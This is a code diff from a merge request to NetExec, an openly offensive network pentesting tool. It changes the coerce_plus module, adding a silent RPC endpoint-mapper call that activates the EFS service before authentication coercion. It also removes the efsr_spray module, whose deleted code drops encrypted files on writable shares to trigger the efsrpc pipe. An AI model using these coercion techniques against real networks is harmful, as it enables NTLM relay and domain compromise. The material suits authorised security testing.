Merge pull request Pennyw0rth#866 from rtpt-romankarwacik/simple_efs_activator

Remove efsr_spray module, superceded by simply using EPM map on the EFS interface

Author: NeffIsBack

nxc/modules/coerce_plus.py

@@ -1,10 +1,10 @@
-from impacket import uuid
 from impacket.dcerpc.v5 import transport, rprn, even, epm
 from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRPOINTERNULL
 from impacket.dcerpc.v5.dtypes import LPBYTE, USHORT, LPWSTR, DWORD, ULONG, NULL, WSTR, LONG, BOOL, PCHAR, RPC_SID
 from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
 
 from impacket.uuid import uuidtup_to_bin
+import contextlib
 
 
 class NXCModule:
@@ -211,6 +211,15 @@ def on_login(self, context, connection):
             context.log.error("Invalid method, please check the method name.")
             return
 
+    @staticmethod
+    def get_dynamic_endpoint(interface: bytes, target: str, timeout: int = 5) -> str:
+        string_binding = rf"ncacn_ip_tcp:{target}[135]"
+        rpctransport = transport.DCERPCTransportFactory(string_binding)
+        rpctransport.set_connect_timeout(timeout)
+        dce = rpctransport.get_dce_rpc()
+        dce.connect()
+        return epm.hept_map(target, interface, protocol="ncacn_ip_tcp", dce=dce)
+
 
 class ShadowCoerceTrigger:
     def __init__(self, context):
@@ -528,6 +537,11 @@ def connect(self, username, password, domain, lmhash, nthash, aesKey, target, do
             },
         }
 
+        # activates EFS
+        # https://specterops.io/blog/2025/08/19/will-webclient-start/
+        with contextlib.suppress(Exception):
+            NXCModule.get_dynamic_endpoint(uuidtup_to_bin(("df1941c5-fe89-4e79-bf10-463657acf44d", "0.0")), target, timeout=1)
+
         rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"])
         rpctransport.set_dport(445)
 
@@ -755,27 +769,6 @@ class PrinterBugTrigger:
     def __init__(self, context):
         self.context = context
 
-    def get_dynamic_endpoint(self, interface: bytes, target: str, timeout: int = 5) -> str:
-        string_binding = rf"ncacn_ip_tcp:{target}[135]"
-        rpctransport = transport.DCERPCTransportFactory(string_binding)
-        rpctransport.set_connect_timeout(timeout)
-        dce = rpctransport.get_dce_rpc()
-        self.context.log.debug(f"Trying to resolve dynamic endpoint {uuid.bin_to_string(interface)!r}")
-        try:
-            dce.connect()
-        except Exception as e:
-            self.context.log.warning(f"Failed to connect to endpoint mapper: {e}")
-            raise e
-        try:
-            endpoint = epm.hept_map(target, interface, protocol="ncacn_ip_tcp", dce=dce)
-            self.context.log.debug(
-                f"Resolved dynamic endpoint {uuid.bin_to_string(interface)!r} to {endpoint!r}"
-            )
-            return endpoint
-        except Exception as e:
-            self.context.log.debug(f"Failed to resolve dynamic endpoint {uuid.bin_to_string(interface)!r}")
-            raise e
-
     def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost, pipe):
         binding_params = {
             "spoolss": {
@@ -784,7 +777,7 @@ def connect(self, username, password, domain, lmhash, nthash, aesKey, target, do
                 "port": 445
             },
             "[dcerpc]": {
-                "stringBinding": self.get_dynamic_endpoint(uuidtup_to_bin(("12345678-1234-abcd-ef00-0123456789ab", "1.0")), target),
+                "stringBinding": NXCModule.get_dynamic_endpoint(uuidtup_to_bin(("12345678-1234-abcd-ef00-0123456789ab", "1.0")), target),
                 "MSRPC_UUID_RPRN": ("12345678-1234-abcd-ef00-0123456789ab", "1.0"),
                 "port": None
             }

nxc/modules/efsr_spray.py

@@ -1,31 +1,9 @@
-import ntpath
-from nxc.helpers.misc import gen_random_string
 from nxc.context import Context
-from impacket.smb3structs import FILE_SHARE_WRITE, FILE_SHARE_DELETE, FILE_ATTRIBUTE_ENCRYPTED
-from impacket.smbconnection import SessionError, SMBConnection
-
-
-def get_error_string(exception):
-    if hasattr(exception, "getErrorString"):
-        try:
-            es = exception.getErrorString()
-        except KeyError:
-            return f"Could not get nt error code {exception.getErrorCode()} from impacket: {exception}"
-        if type(es) is tuple:
-            return es[0]
-        else:
-            return es
-    else:
-        return str(exception)
 
 
 class NXCModule:
-    """EFSR Spray Module
-    Module by @rtpt-romankarwacik
-    """
-
     name = "efsr_spray"
-    description = "Tries to activate the EFSR service by creating a file with the encryption attribute on some available share."
+    description = "[REMOVED] Tries to activate the EFSR service by creating a file with the encryption attribute on some available share."
     supported_protocols = ["smb"]
     excluded_shares = ["SYSVOL"]
 
@@ -35,76 +13,6 @@ def options(self, context: Context, module_options: dict[str, str]):
         SHARE_NAME     If set, ONLY this share will be used
         EXCLUDED_SHARES List of share names which will not be used, seperated by comma
         """
-        self.file_name = module_options.get("FILE_NAME", ntpath.normpath("\\" + gen_random_string() + ".txt"))
-        self.share_name = module_options.get("SHARE_NAME")
-        if module_options.get("EXCLUDED_SHARES"):
-            self.excluded_shares += module_options.get("EXCLUDED_SHARES", "").split(",")
 
     def on_login(self, context: Context, connection):
-        conn: SMBConnection = connection.conn  # Because typing is broken due to smb being a folder and a file >:(
-
-        try:
-            shares = conn.listShares()
-        except SessionError as e:
-            error = get_error_string(e)
-            context.log.fail(f"Error enumerating shares: {error}", color="magenta")
-            return
-
-        # Check if named pipe is already available
-        try:
-            named_pipe_names = [f.get_shortname() for f in conn.listPath("IPC$", "*")]
-            if "efsrpc" in named_pipe_names:
-                context.log.highlight("efsrpc named pipe is already available!")
-                # if it is already activated we just skip this computer
-                return
-        except SessionError as e:
-            error = get_error_string(e)
-            context.log.fail(f"Error enumerating named pipes: {error}", color="magenta")
-            return
-
-        # Write an encrypted file on the share root.
-        # This will likely fail with STATUS_ACCESS_DENIED if we do not have the permission to create encrypted files,
-        # but this does not matter as the service will be activated nevertheless if we have WRITE or MODIFY access
-        for share in shares:
-            share_name = share["shi1_netname"][:-1]
-            if self.share_name is not None and self.share_name != share_name:
-                continue
-
-            if share_name in self.excluded_shares:
-                continue
-
-            try:
-                context.log.debug(f"Connecting to share {share_name}...")
-                tid = conn.connectTree(share_name)
-            except SessionError as e:
-                context.log.debug(f"Could not connect to share {share_name}: {e}")
-                continue
-            try:
-                context.log.debug(f"Creating file in {share_name}...")
-                fid = conn.createFile(tid, self.file_name,
-                                      desiredAccess=FILE_SHARE_WRITE,
-                                      shareMode=FILE_SHARE_DELETE,
-                                      fileAttributes=FILE_ATTRIBUTE_ENCRYPTED)
-                conn.closeFile(tid, fid)
-                try:
-                    # this can happen when we have special permissions to create encrypted files
-                    conn.deleteFile(share_name, self.file_name)
-                except SessionError as e:
-                    error = get_error_string(e)
-                    if error == "STATUS_OBJECT_NAME_NOT_FOUND":
-                        pass
-                    context.log.fail(f"Error DELETING created temp file {self.file_name} on share {share_name}: {error}")
-            except SessionError as e:
-                context.log.debug(f"Error writing encrypted file on share {share_name}: {get_error_string(e)} (This does not necessarily mean that the attack failed!)")
-
-        try:
-            tid = conn.connectTree("IPC$")
-            conn.waitNamedPipe(tid, "efsrpc", 10)
-            context.log.highlight("Successfully activated efsrpc named pipe!")
-        except SessionError as e:
-            error = get_error_string(e)
-            if error == "STATUS_OBJECT_NAME_NOT_FOUND":
-                context.log.debug("efsrpc pipe was not activated.")
-            else:
-                context.log.fail(f"Error waiting for named pipe: {error}", color="magenta")
-            return
+        context.log.fail('[REMOVED] This module has been made obsolete and EFS will be activated automatically by "coerce_plus"')